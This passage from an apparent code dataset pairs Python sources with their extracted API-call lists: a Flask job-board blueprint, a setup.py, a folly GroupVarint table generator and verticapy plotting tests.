'"""upper right"""', 'fontsize': '(14)'}), "(loc='upper right', fontsize=14)\n", (6786, 6818), True, 'import matplotlib.pyplot as plt\n'), ((10456, 10478), 'numpy.mean', 'np.mean', (['analysis_list'], {}), '(analysis_list)\n', (10463, 10478), True, 'import numpy as np\n'), ((10481, 10503), 'numpy.mean', 'np.mean', (['analysis_rand'], {}), '(analysis_rand)\n', (10488, 10503), True, 'import numpy as np\n'), ((10511, 10532), 'numpy.std', 'np.std', (['analysis_rand'], {}), '(analysis_rand)\n', (10517, 10532), True, 'import numpy as np\n'), ((10549, 10565), 'scipy.special.ndtr', 'ndtr', (['analysis_z'], {}), '(analysis_z)\n', (10553, 10565), False, 'from scipy.special import ndtr\n'), ((4483, 4512), 'numpy.random.shuffle', 'np.random.shuffle', (['genes_temp'], {}), '(genes_temp)\n', (4500, 4512), True, 'import numpy as np\n'), ((5310, 5337), 'networkx.subgraph', 'nx.subgraph', (['Gint', 'focal_80'], {}), '(Gint, focal_80)\n', (5321, 5337), True, 'import networkx as nx\n'), ((5368, 5412), 'networkx.connected_component_subgraphs', 'nx.connected_component_subgraphs', (['G_sub_temp'], {}), '(G_sub_temp)\n', (5400, 5412), True, 'import networkx as nx\n'), ((5565, 5595), 'networkx.subgraph', 'nx.subgraph', (['Gint', 'seed_random'], {}), '(Gint, seed_random)\n', (5576, 5595), True, 'import networkx as nx\n'), ((5626, 5670), 'networkx.connected_component_subgraphs', 'nx.connected_component_subgraphs', (['G_sub_temp'], {}), '(G_sub_temp)\n', (5658, 5670), True, 'import networkx as nx\n'), ((10611, 10627), 'scipy.special.ndtr', 'ndtr', (['analysis_z'], {}), '(analysis_z)\n', (10615, 10627), False, 'from scipy.special import ndtr\n'), ((4887, 4914), 'networkx.subgraph', 'nx.subgraph', (['Gint', 'focal_80'], {}), '(Gint, focal_80)\n', (4898, 4914), True, 'import networkx as nx\n'), ((5070, 5100), 'networkx.subgraph', 'nx.subgraph', (['Gint', 'seed_random'], {}), '(Gint, seed_random)\n', (5081, 5100), True, 'import networkx as nx\n')]
|
from app import app
from app import db
from datetime import datetime
from flask import Blueprint
from flask import render_template
from flask import redirect
from flask import url_for
from flask import request
from flask import flash
from flask_login import current_user
from flask_login import login_required
from app.models.job import Job
from app.forms.job_form import JobSubmissionForm
from app.helper.auth_helper import requires_roles
job = Blueprint("job", __name__)
@job.route("/job", methods=["GET"])
def listing():
jobs = Job.query.filter_by(is_active=True, is_removed=False).all()
return render_template("/job/list.html", title="opening jobs", jobs=jobs)
@job.route("/job/<int:id>", methods=["GET"])
def view(id):
jobs = Job.query.get(int(id))
return render_template("/job/detail.html", title="job detail", jobs=jobs)
@job.route("/job/submit", methods=["GET", "POST"])
@login_required
def submit():
form = JobSubmissionForm()
if form.validate_on_submit():
jobs = Job(
title=form.title.data,
company=form.company.data,
location=form.location.data,
description=form.description.data,
skills=form.skills.data,
website=form.website.data,
contact=form.contact.data,
employment=form.employment.data,
on_site=form.on_site.data,
)
jobs.user_id = current_user.id
jobs.created_at = datetime.utcnow()
db.session.add(jobs)
db.session.commit()
return redirect(url_for("job.listing"))
return render_template("/job/submit.html", title="job submission", form=form)
@job.route("/job/moderation", methods=["GET"])
@login_required
@requires_roles("admin", "momod")
def moderation():
jobs = Job.query.all()
return render_template("/job/moderation.html", title="jobs moderation", jobs=jobs)
@job.route("/job/remove/<int:id>", methods=["GET"])
@login_required
@requires_roles("admin", "momod")
def remove(id):
jobs = Job.query.get(int(id))
jobs.is_removed = True
db.session.commit()
return redirect(url_for("job.moderation"))
@job.route("/job/activate/<int:id>", methods=["GET"])
@login_required
@requires_roles("admin", "momod")
def activate(id):
jobs = Job.query.get(int(id))
jobs.is_active = True
db.session.commit()
return redirect(url_for("job.moderation"))
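# Hedged wiring note (module path assumed, not taken from the original
# project): the blueprint above still has to be registered on the Flask
# app object for these routes to resolve, e.g. in the app factory:
#
#     from app.views.job import job
#     app.register_blueprint(job)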
|
[
"app.models.job.Job.query.all",
"flask.Blueprint",
"app.forms.job_form.JobSubmissionForm",
"app.helper.auth_helper.requires_roles",
"datetime.datetime.utcnow",
"flask.url_for",
"app.db.session.commit",
"flask.render_template",
"app.models.job.Job.query.filter_by",
"app.db.session.add",
"app.models.job.Job"
] |
[((451, 477), 'flask.Blueprint', 'Blueprint', (['"""job"""', '__name__'], {}), "('job', __name__)\n", (460, 477), False, 'from flask import Blueprint\n'), ((1728, 1760), 'app.helper.auth_helper.requires_roles', 'requires_roles', (['"""admin"""', '"""momod"""'], {}), "('admin', 'momod')\n", (1742, 1760), False, 'from app.helper.auth_helper import requires_roles\n'), ((1964, 1996), 'app.helper.auth_helper.requires_roles', 'requires_roles', (['"""admin"""', '"""momod"""'], {}), "('admin', 'momod')\n", (1978, 1996), False, 'from app.helper.auth_helper import requires_roles\n'), ((2218, 2250), 'app.helper.auth_helper.requires_roles', 'requires_roles', (['"""admin"""', '"""momod"""'], {}), "('admin', 'momod')\n", (2232, 2250), False, 'from app.helper.auth_helper import requires_roles\n'), ((613, 679), 'flask.render_template', 'render_template', (['"""/job/list.html"""'], {'title': '"""opening jobs"""', 'jobs': 'jobs'}), "('/job/list.html', title='opening jobs', jobs=jobs)\n", (628, 679), False, 'from flask import render_template\n'), ((786, 852), 'flask.render_template', 'render_template', (['"""/job/detail.html"""'], {'title': '"""job detail"""', 'jobs': 'jobs'}), "('/job/detail.html', title='job detail', jobs=jobs)\n", (801, 852), False, 'from flask import render_template\n'), ((947, 966), 'app.forms.job_form.JobSubmissionForm', 'JobSubmissionForm', ([], {}), '()\n', (964, 966), False, 'from app.forms.job_form import JobSubmissionForm\n'), ((1591, 1661), 'flask.render_template', 'render_template', (['"""/job/submit.html"""'], {'title': '"""job submission"""', 'form': 'form'}), "('/job/submit.html', title='job submission', form=form)\n", (1606, 1661), False, 'from flask import render_template\n'), ((1790, 1805), 'app.models.job.Job.query.all', 'Job.query.all', ([], {}), '()\n', (1803, 1805), False, 'from app.models.job import Job\n'), ((1817, 1892), 'flask.render_template', 'render_template', (['"""/job/moderation.html"""'], {'title': '"""jobs moderation"""', 'jobs': 'jobs'}), "('/job/moderation.html', title='jobs moderation', jobs=jobs)\n", (1832, 1892), False, 'from flask import render_template\n'), ((2078, 2097), 'app.db.session.commit', 'db.session.commit', ([], {}), '()\n', (2095, 2097), False, 'from app import db\n'), ((2333, 2352), 'app.db.session.commit', 'db.session.commit', ([], {}), '()\n', (2350, 2352), False, 'from app import db\n'), ((1016, 1287), 'app.models.job.Job', 'Job', ([], {'title': 'form.title.data', 'company': 'form.company.data', 'location': 'form.location.data', 'description': 'form.description.data', 'skills': 'form.skills.data', 'website': 'form.website.data', 'contact': 'form.contact.data', 'employment': 'form.employment.data', 'on_site': 'form.on_site.data'}), '(title=form.title.data, company=form.company.data, location=form.\n location.data, description=form.description.data, skills=form.skills.\n data, website=form.website.data, contact=form.contact.data, employment=\n form.employment.data, on_site=form.on_site.data)\n', (1019, 1287), False, 'from app.models.job import Job\n'), ((1457, 1474), 'datetime.datetime.utcnow', 'datetime.utcnow', ([], {}), '()\n', (1472, 1474), False, 'from datetime import datetime\n'), ((1483, 1503), 'app.db.session.add', 'db.session.add', (['jobs'], {}), '(jobs)\n', (1497, 1503), False, 'from app import db\n'), ((1512, 1531), 'app.db.session.commit', 'db.session.commit', ([], {}), '()\n', (1529, 1531), False, 'from app import db\n'), ((2118, 2143), 'flask.url_for', 'url_for', (['"""job.moderation"""'], {}), "('job.moderation')\n", 
(2125, 2143), False, 'from flask import url_for\n'), ((2373, 2398), 'flask.url_for', 'url_for', (['"""job.moderation"""'], {}), "('job.moderation')\n", (2380, 2398), False, 'from flask import url_for\n'), ((542, 595), 'app.models.job.Job.query.filter_by', 'Job.query.filter_by', ([], {'is_active': '(True)', 'is_removed': '(False)'}), '(is_active=True, is_removed=False)\n', (561, 595), False, 'from app.models.job import Job\n'), ((1556, 1578), 'flask.url_for', 'url_for', (['"""job.listing"""'], {}), "('job.listing')\n", (1563, 1578), False, 'from flask import url_for\n')]
|
import setuptools
import datacite_rest as meta
with open('README.md', 'r', encoding='utf-8') as fh:
long_description = fh.read()
install_requires = [
'pydantic>=1.8.1,<1.9',
'pyhumps>=1.6.1,<1.7',
'requests>=2.25.1,<2.26'
]
tests_require = install_requires + ['pytest']
setuptools.setup(
name=meta.__title__,
version=meta.__version__,
author=meta.__author__,
author_email=meta.__author_email__,
description=meta.__description__,
long_description=long_description,
long_description_content_type='text/markdown',
url='https://github.com/pypa/sampleproject',
license=meta.__license__,
project_urls={
'Bug Tracker': 'https://github.com/pypa/sampleproject/issues',
},
install_requires=install_requires,
tests_require=tests_require,
classifiers=[
'Programming Language :: Python :: 3',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
],
packages=setuptools.find_packages(),
python_requires='>=3.6',
)
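# Hedged usage note (commands assumed, not from this repository's docs):
# with the metadata above, an editable install and a distributable build
# are typically driven by:
#
#     pip install -e .
#     python -m build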
|
[
"setuptools.find_packages"
] |
[((989, 1015), 'setuptools.find_packages', 'setuptools.find_packages', ([], {}), '()\n', (1013, 1015), False, 'import setuptools\n')]
|
#!/usr/bin/env python
#
# Generate tables for GroupVarint32
# Copyright 2011 Facebook
#
# @author <NAME> (<EMAIL>)
#
# Reference: http://www.stepanovpapers.com/CIKM_2011.pdf
#
# From 17 encoded bytes, we may use between 5 and 17 bytes to encode 4
# integers. The first byte is a key that indicates how many bytes each of
# the 4 integers takes:
#
# bit 0..1: length-1 of first integer
# bit 2..3: length-1 of second integer
# bit 4..5: length-1 of third integer
# bit 6..7: length-1 of fourth integer
#
# The value of the first byte is used as the index in a table which returns
# a mask value for the SSSE3 PSHUFB instruction, which takes an XMM register
# (16 bytes) and shuffles bytes from it into a destination XMM register
# (optionally setting some of them to 0)
#
# For example, if the key has value 4, that means that the first integer
# uses 1 byte, the second uses 2 bytes, the third and fourth use 1 byte each,
# so we set the mask value so that
#
# r[0] = a[0]
# r[1] = 0
# r[2] = 0
# r[3] = 0
#
# r[4] = a[1]
# r[5] = a[2]
# r[6] = 0
# r[7] = 0
#
# r[8] = a[3]
# r[9] = 0
# r[10] = 0
# r[11] = 0
#
# r[12] = a[4]
# r[13] = 0
# r[14] = 0
# r[15] = 0
import os
from optparse import OptionParser
OUTPUT_FILE = "GroupVarintTables.cpp"
def generate(f):
f.write("""
#include "folly/Portability.h"
#if FOLLY_X64 || defined(__i386__)
#include <stdint.h>
#include <x86intrin.h>
namespace folly {
namespace detail {
extern const __m128i groupVarintSSEMasks[] = {
""")
# Compute SSE masks
for i in range(0, 256):
offset = 0
vals = [0, 0, 0, 0]
for j in range(0, 4):
d = 1 + ((i >> (2 * j)) & 3)
# the j'th integer uses d bytes, consume them
for k in range(0, d):
vals[j] |= offset << (8 * k)
offset += 1
# set remaining bytes in result to 0
# 0xff: set corresponding byte in result to 0
for k in range(d, 4):
vals[j] |= 0xff << (8 * k)
f.write(" {{static_cast<int64_t>(0x{1:08x}{0:08x}), "
"static_cast<int64_t>(0x{3:08x}{2:08x})}},\n".format(*vals))
f.write("};\n"
"\n"
"extern const uint8_t groupVarintLengths[] = {\n")
# Also compute total encoded lengths, including key byte
for i in range(0, 256):
offset = 1 # include key byte
for j in range(0, 4):
d = 1 + ((i >> (2 * j)) & 3)
offset += d
f.write(" {0},\n".format(offset))
f.write("""
};
} // namespace detail
} // namespace folly
#endif /* FOLLY_X64 || defined(__i386__) */
""")
def main():
parser = OptionParser()
parser.add_option("--install_dir", dest="install_dir", default=".",
help="write output to DIR", metavar="DIR")
parser.add_option("--fbcode_dir")
(options, args) = parser.parse_args()
f = open(os.path.join(options.install_dir, OUTPUT_FILE), "w")
generate(f)
f.close()
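# Hedged pure-Python cross-check (illustration only; not emitted into the
# generated C++): decode one group with the same key semantics the masks
# above encode, which is handy for sanity-checking the tables.
def decode_group(key, data):
    """Decode 4 little-endian integers whose byte lengths are packed in key."""
    out, offset = [], 0
    for j in range(0, 4):
        d = 1 + ((key >> (2 * j)) & 3)
        val = 0
        for k in range(0, d):
            val |= data[offset + k] << (8 * k)
        out.append(val)
        offset += d
    return out, offset  # offset == payload bytes consumed (key byte excluded)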
if __name__ == "__main__":
main()
|
[
"os.path.join",
"optparse.OptionParser"
] |
[((2646, 2660), 'optparse.OptionParser', 'OptionParser', ([], {}), '()\n', (2658, 2660), False, 'from optparse import OptionParser\n'), ((2891, 2937), 'os.path.join', 'os.path.join', (['options.install_dir', 'OUTPUT_FILE'], {}), '(options.install_dir, OUTPUT_FILE)\n', (2903, 2937), False, 'import os\n')]
|
# (c) Copyright [2018-2021] Micro Focus or one of its affiliates.
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest, datetime, warnings
from verticapy import vDataFrame, drop_table, create_verticapy_schema
import matplotlib.pyplot as plt
from verticapy import set_option
set_option("print_info", False)
@pytest.fixture(scope="module")
def titanic_vd(base):
from verticapy.learn.datasets import load_titanic
titanic = load_titanic(cursor=base.cursor)
yield titanic
with warnings.catch_warnings(record=True) as w:
drop_table(
name="public.titanic", cursor=base.cursor,
)
@pytest.fixture(scope="module")
def amazon_vd(base):
from verticapy.learn.datasets import load_amazon
amazon = load_amazon(cursor=base.cursor)
yield amazon
drop_table(
name="public.amazon", cursor=base.cursor,
)
@pytest.fixture(scope="module")
def iris_vd(base):
from verticapy.learn.datasets import load_iris
iris = load_iris(cursor=base.cursor)
yield iris
drop_table(
name="public.iris", cursor=base.cursor,
)
@pytest.fixture(scope="module")
def world_vd(base):
from verticapy.learn.datasets import load_world
cities = load_world(cursor=base.cursor)
yield cities
with warnings.catch_warnings(record=True) as w:
drop_table(
name="public.world", cursor=base.cursor,
)
class TestvDFPlot:
def test_vDF_stacked_area(self, amazon_vd):
assert (
len(
amazon_vd.pivot("date", "state", "number")
.stacked_area("date", ["ACRE", "BAHIA"])
.get_default_bbox_extra_artists()
)
== 12
)
plt.close()
assert (
len(
amazon_vd.pivot("date", "state", "number")
.stacked_area("date", ["ACRE", "BAHIA"], fully=True)
.get_default_bbox_extra_artists()
)
== 12
)
plt.close()
def test_vDF_bar(self, titanic_vd):
# testing vDataFrame[].bar
# auto
result = titanic_vd["fare"].bar()
assert result.get_default_bbox_extra_artists()[0].get_width() == pytest.approx(
0.7965964343598055
)
assert result.get_default_bbox_extra_artists()[1].get_width() == pytest.approx(
0.12236628849270664
)
assert result.get_yticks()[1] == pytest.approx(42.694100000000006)
plt.close()
# method=sum of=survived and bins=5
result2 = titanic_vd["fare"].bar(method="sum", of="survived", bins=5)
assert result2.get_default_bbox_extra_artists()[0].get_width() == pytest.approx(
391
)
assert result2.get_default_bbox_extra_artists()[1].get_width() == pytest.approx(
34
)
assert result2.get_yticks()[1] == pytest.approx(102.46583999999999)
plt.close()
# testing vDataFrame.bar
# auto & stacked
for hist_type in ["auto", "stacked"]:
result3 = titanic_vd.bar(
columns=["pclass", "survived"],
method="50%",
of="fare",
hist_type=hist_type,
)
assert result3.get_default_bbox_extra_artists()[
0
].get_width() == pytest.approx(50.0)
assert result3.get_default_bbox_extra_artists()[
3
].get_width() == pytest.approx(77.9583)
plt.close()
# fully_stacked
result4 = titanic_vd.bar(
columns=["pclass", "survived"], hist_type="fully_stacked"
)
assert result4.get_default_bbox_extra_artists()[0].get_width() == pytest.approx(
0.38782051282051283
)
assert result4.get_default_bbox_extra_artists()[3].get_width() == pytest.approx(
0.6121794871794872
)
plt.close()
# pyramid
result5 = titanic_vd.bar(columns=["pclass", "survived"], hist_type="pyramid")
assert result5.get_default_bbox_extra_artists()[0].get_width() == pytest.approx(
0.09805510534846029
)
assert result5.get_default_bbox_extra_artists()[3].get_width() == pytest.approx(
-0.1547811993517018
)
def test_vDF_boxplot(self, titanic_vd):
# testing vDataFrame[].boxplot
result = titanic_vd["age"].boxplot()
assert result.get_default_bbox_extra_artists()[0].get_data()[0][
0
] == pytest.approx(16.07647847)
assert result.get_default_bbox_extra_artists()[1].get_data()[0][
0
] == pytest.approx(36.25)
plt.close()
# testing vDataFrame.boxplot
result = titanic_vd.boxplot(columns=["age", "fare"])
assert result.get_default_bbox_extra_artists()[6].get_data()[1][
0
] == pytest.approx(31.3875)
assert result.get_default_bbox_extra_artists()[6].get_data()[1][
1
] == pytest.approx(512.3292)
plt.close()
def test_vDF_bubble(self, iris_vd):
# testing vDataFrame.bubble
result = iris_vd.bubble(
columns=["PetalLengthCm", "SepalLengthCm"], size_bubble_col="PetalWidthCm"
)
result = result.get_default_bbox_extra_artists()[0]
assert max([elem[0] for elem in result.get_offsets().data]) == 6.9
assert max([elem[1] for elem in result.get_offsets().data]) == 7.9
plt.close()
# testing vDataFrame.scatter using parameter catcol
result2 = iris_vd.bubble(
columns=["PetalLengthCm", "SepalLengthCm"],
size_bubble_col="PetalWidthCm",
catcol="Species",
)
result2 = result2.get_default_bbox_extra_artists()[0]
assert max([elem[0] for elem in result2.get_offsets().data]) <= 6.9
assert max([elem[1] for elem in result2.get_offsets().data]) <= 7.9
plt.close()
def test_vDF_density(self, iris_vd):
# testing vDataFrame[].density
try:
create_verticapy_schema(iris_vd._VERTICAPY_VARIABLES_["cursor"])
except:
pass
for kernel in ["gaussian", "logistic", "sigmoid", "silverman"]:
result = iris_vd["PetalLengthCm"].density(kernel=kernel, nbins=20)
assert max(result.get_default_bbox_extra_artists()[1].get_data()[1]) < 0.25
plt.close()
# testing vDataFrame.density
for kernel in ["gaussian", "logistic", "sigmoid", "silverman"]:
result = iris_vd.density(kernel=kernel, nbins=20)
assert max(result.get_default_bbox_extra_artists()[5].get_data()[1]) < 0.37
plt.close()
def test_vDF_geo_plot(self, world_vd):
assert (
len(
world_vd["geometry"]
.geo_plot(column="pop_est", cmap="Reds")
.get_default_bbox_extra_artists()
)
== 8
)
plt.close()
@pytest.mark.skip(reason="test not implemented")
def test_vDF_hchart(self):
pass
def test_vDF_heatmap(self, iris_vd):
result = iris_vd.heatmap(
["PetalLengthCm", "SepalLengthCm"],
method="avg",
of="SepalWidthCm",
h=(1, 1),
)
assert result.get_default_bbox_extra_artists()[-2].get_size() == (5, 4)
plt.close()
def test_vDF_hexbin(self, titanic_vd):
result = titanic_vd.hexbin(columns=["age", "fare"], method="avg", of="survived")
result = result.get_default_bbox_extra_artists()[0]
assert max([elem[0] for elem in result.get_offsets()]) == pytest.approx(
80.00000007967, 1e-2
)
assert max([elem[1] for elem in result.get_offsets()]) == pytest.approx(
512.3292, 1e-2
)
plt.close()
def test_vDF_hist(self, titanic_vd):
# testing vDataFrame[].hist
# auto
result = titanic_vd["age"].hist()
assert result.get_default_bbox_extra_artists()[0].get_height() == pytest.approx(
0.050243111831442464
)
assert result.get_default_bbox_extra_artists()[1].get_height() == pytest.approx(
0.029983792544570502
)
assert result.get_xticks()[1] == pytest.approx(7.24272727)
plt.close()
# method=avg of=survived and h=15
result2 = titanic_vd["age"].hist(method="avg", of="survived", h=15)
assert result2.get_default_bbox_extra_artists()[
0
].get_height() == pytest.approx(0.534653465346535)
assert result2.get_default_bbox_extra_artists()[
1
].get_height() == pytest.approx(0.354838709677419)
assert result2.get_xticks()[1] == pytest.approx(15)
plt.close()
# testing vDataFrame.hist
# auto & stacked
for hist_type in ["auto", "stacked"]:
result3 = titanic_vd.hist(
columns=["pclass", "sex"],
method="avg",
of="survived",
hist_type=hist_type,
)
assert result3.get_default_bbox_extra_artists()[
0
].get_height() == pytest.approx(0.964285714285714)
assert result3.get_default_bbox_extra_artists()[
3
].get_height() == pytest.approx(0.325581395348837)
plt.close()
# multi
result4 = titanic_vd.hist(columns=["fare", "age"], hist_type="multi")
assert result4.get_default_bbox_extra_artists()[
0
].get_height() == pytest.approx(0.07374392220421394)
assert result4.get_default_bbox_extra_artists()[
1
].get_height() == pytest.approx(0.4327390599675851)
plt.close()
def test_vDF_pie(self, titanic_vd):
# testing vDataFrame[].pie
result = titanic_vd["pclass"].pie(method="avg", of="survived")
assert int(result.get_default_bbox_extra_artists()[6].get_text()) == 3
assert float(
result.get_default_bbox_extra_artists()[7].get_text()
) == pytest.approx(0.227753)
plt.close()
# testing vDataFrame.pie
result = titanic_vd.pie(["sex", "pclass"])
assert result.get_default_bbox_extra_artists()[9].get_text() == "11.3%"
plt.close()
# testing vDataFrame[].pie - donut
result = titanic_vd["sex"].pie(method="sum", of="survived", pie_type="donut")
assert result.get_default_bbox_extra_artists()[6].get_text() == "female"
assert int(
result.get_default_bbox_extra_artists()[7].get_text()
) == pytest.approx(302)
plt.close()
# testing vDataFrame[].pie - rose
result = titanic_vd["sex"].pie(method="sum", of="survived", pie_type="rose")
assert len(result.get_default_bbox_extra_artists()) == 8
plt.close()
def test_vDF_pivot_table(self, titanic_vd):
result = titanic_vd.pivot_table(
columns=["age", "pclass"], method="avg", of="survived"
)
assert result[1][0] == pytest.approx(0.75)
assert result[1][1] == pytest.approx(1.0)
assert result[1][2] == pytest.approx(0.782608695652174)
assert result[2][0] == pytest.approx(1.0)
assert result[2][1] == pytest.approx(0.875)
assert result[2][2] == pytest.approx(0.375)
assert len(result[1]) == 12
plt.close()
def test_vDF_outliers_plot(self, titanic_vd):
assert (
len(titanic_vd.outliers_plot(["fare"]).get_default_bbox_extra_artists())
== 24
)
plt.close()
assert (
len(
titanic_vd.outliers_plot(
["fare", "age"]
).get_default_bbox_extra_artists()
)
== 25
)
plt.close()
def test_vDF_plot(self, amazon_vd):
# testing vDataFrame[].plot
result = amazon_vd["number"].plot(ts="date", by="state")
result = result.get_default_bbox_extra_artists()[0].get_data()
assert len(result[0]) == len(result[1]) == pytest.approx(239, 1e-2)
plt.close()
# testing vDataFrame.plot
result = amazon_vd.groupby(["date"], ["AVG(number) AS number"])
result = result.plot(ts="date", columns=["number"])
result = result.get_default_bbox_extra_artists()[0].get_data()
assert result[0][0] == datetime.date(1998, 1, 1)
assert result[0][-1] == datetime.date(2017, 11, 1)
assert result[1][0] == pytest.approx(0.0)
assert result[1][-1] == pytest.approx(651.2962963)
plt.close()
def test_vDF_range_plot(self, amazon_vd):
assert (
len(
amazon_vd["number"]
.range_plot(ts="date")
.get_default_bbox_extra_artists()
)
== 10
)
plt.close()
assert (
len(
amazon_vd["number"]
.range_plot(ts="date")
.get_default_bbox_extra_artists()
)
== 10
)
plt.close()
def test_vDF_scatter(self, iris_vd):
# testing vDataFrame.scatter
result = iris_vd.scatter(columns=["PetalLengthCm", "SepalLengthCm"])
result = result.get_default_bbox_extra_artists()[0]
assert max([elem[0] for elem in result.get_offsets().data]) == 6.9
assert max([elem[1] for elem in result.get_offsets().data]) == 7.9
plt.close()
result2 = iris_vd.scatter(
columns=["PetalLengthCm", "SepalLengthCm", "SepalWidthCm"]
)
result2 = result2.get_default_bbox_extra_artists()[0]
assert max([elem[0] for elem in result2.get_offsets().data]) == 6.9
assert max([elem[1] for elem in result2.get_offsets().data]) == 7.9
plt.close()
# testing vDataFrame.scatter using parameter catcol
result3 = iris_vd.scatter(
columns=["PetalLengthCm", "SepalLengthCm"], catcol="Species"
)
result3 = result3.get_default_bbox_extra_artists()[0]
assert max([elem[0] for elem in result3.get_offsets().data]) <= 6.9
assert max([elem[1] for elem in result3.get_offsets().data]) <= 7.9
plt.close()
result4 = iris_vd.scatter(
columns=["PetalLengthCm", "SepalLengthCm", "SepalWidthCm"], catcol="Species"
)
result4 = result4.get_default_bbox_extra_artists()[0]
assert max([elem[0] for elem in result3.get_offsets().data]) <= 6.9
assert max([elem[1] for elem in result3.get_offsets().data]) <= 7.9
plt.close()
def test_vDF_scatter_matrix(self, iris_vd):
result = iris_vd.scatter_matrix()
assert len(result) == 4
plt.close()
def test_vDF_spider(self, titanic_vd):
result = titanic_vd["pclass"].spider("survived")
assert len(result.get_default_bbox_extra_artists()) == 9
|
[
"matplotlib.pyplot.close",
"verticapy.drop_table",
"pytest.fixture",
"verticapy.learn.datasets.load_iris",
"verticapy.learn.datasets.load_world",
"pytest.approx",
"datetime.date",
"warnings.catch_warnings",
"verticapy.learn.datasets.load_amazon",
"verticapy.learn.datasets.load_titanic",
"verticapy.set_option",
"pytest.mark.skip",
"verticapy.create_verticapy_schema"
] |
[((778, 809), 'verticapy.set_option', 'set_option', (['"""print_info"""', '(False)'], {}), "('print_info', False)\n", (788, 809), False, 'from verticapy import set_option\n'), ((813, 843), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""module"""'}), "(scope='module')\n", (827, 843), False, 'import pytest, datetime, warnings\n'), ((1126, 1156), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""module"""'}), "(scope='module')\n", (1140, 1156), False, 'import pytest, datetime, warnings\n'), ((1369, 1399), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""module"""'}), "(scope='module')\n", (1383, 1399), False, 'import pytest, datetime, warnings\n'), ((1600, 1630), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""module"""'}), "(scope='module')\n", (1614, 1630), False, 'import pytest, datetime, warnings\n'), ((935, 967), 'verticapy.learn.datasets.load_titanic', 'load_titanic', ([], {'cursor': 'base.cursor'}), '(cursor=base.cursor)\n', (947, 967), False, 'from verticapy.learn.datasets import load_titanic\n'), ((1245, 1276), 'verticapy.learn.datasets.load_amazon', 'load_amazon', ([], {'cursor': 'base.cursor'}), '(cursor=base.cursor)\n', (1256, 1276), False, 'from verticapy.learn.datasets import load_amazon\n'), ((1298, 1350), 'verticapy.drop_table', 'drop_table', ([], {'name': '"""public.amazon"""', 'cursor': 'base.cursor'}), "(name='public.amazon', cursor=base.cursor)\n", (1308, 1350), False, 'from verticapy import vDataFrame, drop_table, create_verticapy_schema\n'), ((1482, 1511), 'verticapy.learn.datasets.load_iris', 'load_iris', ([], {'cursor': 'base.cursor'}), '(cursor=base.cursor)\n', (1491, 1511), False, 'from verticapy.learn.datasets import load_iris\n'), ((1531, 1581), 'verticapy.drop_table', 'drop_table', ([], {'name': '"""public.iris"""', 'cursor': 'base.cursor'}), "(name='public.iris', cursor=base.cursor)\n", (1541, 1581), False, 'from verticapy import vDataFrame, drop_table, create_verticapy_schema\n'), ((1717, 1747), 'verticapy.learn.datasets.load_world', 'load_world', ([], {'cursor': 'base.cursor'}), '(cursor=base.cursor)\n', (1727, 1747), False, 'from verticapy.learn.datasets import load_world\n'), ((7514, 7561), 'pytest.mark.skip', 'pytest.mark.skip', ([], {'reason': '"""test not implemented"""'}), "(reason='test not implemented')\n", (7530, 7561), False, 'import pytest, datetime, warnings\n'), ((995, 1031), 'warnings.catch_warnings', 'warnings.catch_warnings', ([], {'record': '(True)'}), '(record=True)\n', (1018, 1031), False, 'import pytest, datetime, warnings\n'), ((1046, 1099), 'verticapy.drop_table', 'drop_table', ([], {'name': '"""public.titanic"""', 'cursor': 'base.cursor'}), "(name='public.titanic', cursor=base.cursor)\n", (1056, 1099), False, 'from verticapy import vDataFrame, drop_table, create_verticapy_schema\n'), ((1774, 1810), 'warnings.catch_warnings', 'warnings.catch_warnings', ([], {'record': '(True)'}), '(record=True)\n', (1797, 1810), False, 'import pytest, datetime, warnings\n'), ((1825, 1876), 'verticapy.drop_table', 'drop_table', ([], {'name': '"""public.world"""', 'cursor': 'base.cursor'}), "(name='public.world', cursor=base.cursor)\n", (1835, 1876), False, 'from verticapy import vDataFrame, drop_table, create_verticapy_schema\n'), ((2219, 2230), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (2228, 2230), True, 'import matplotlib.pyplot as plt\n'), ((2493, 2504), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (2502, 2504), True, 'import matplotlib.pyplot as plt\n'), ((2980, 2991), 'matplotlib.pyplot.close', 
'plt.close', ([], {}), '()\n', (2989, 2991), True, 'import matplotlib.pyplot as plt\n'), ((3428, 3439), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (3437, 3439), True, 'import matplotlib.pyplot as plt\n'), ((4429, 4440), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (4438, 4440), True, 'import matplotlib.pyplot as plt\n'), ((5192, 5203), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (5201, 5203), True, 'import matplotlib.pyplot as plt\n'), ((5558, 5569), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (5567, 5569), True, 'import matplotlib.pyplot as plt\n'), ((5995, 6006), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (6004, 6006), True, 'import matplotlib.pyplot as plt\n'), ((6463, 6474), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (6472, 6474), True, 'import matplotlib.pyplot as plt\n'), ((7496, 7507), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (7505, 7507), True, 'import matplotlib.pyplot as plt\n'), ((7907, 7918), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (7916, 7918), True, 'import matplotlib.pyplot as plt\n'), ((8362, 8373), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (8371, 8373), True, 'import matplotlib.pyplot as plt\n'), ((8848, 8859), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (8857, 8859), True, 'import matplotlib.pyplot as plt\n'), ((9307, 9318), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (9316, 9318), True, 'import matplotlib.pyplot as plt\n'), ((10292, 10303), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (10301, 10303), True, 'import matplotlib.pyplot as plt\n'), ((10663, 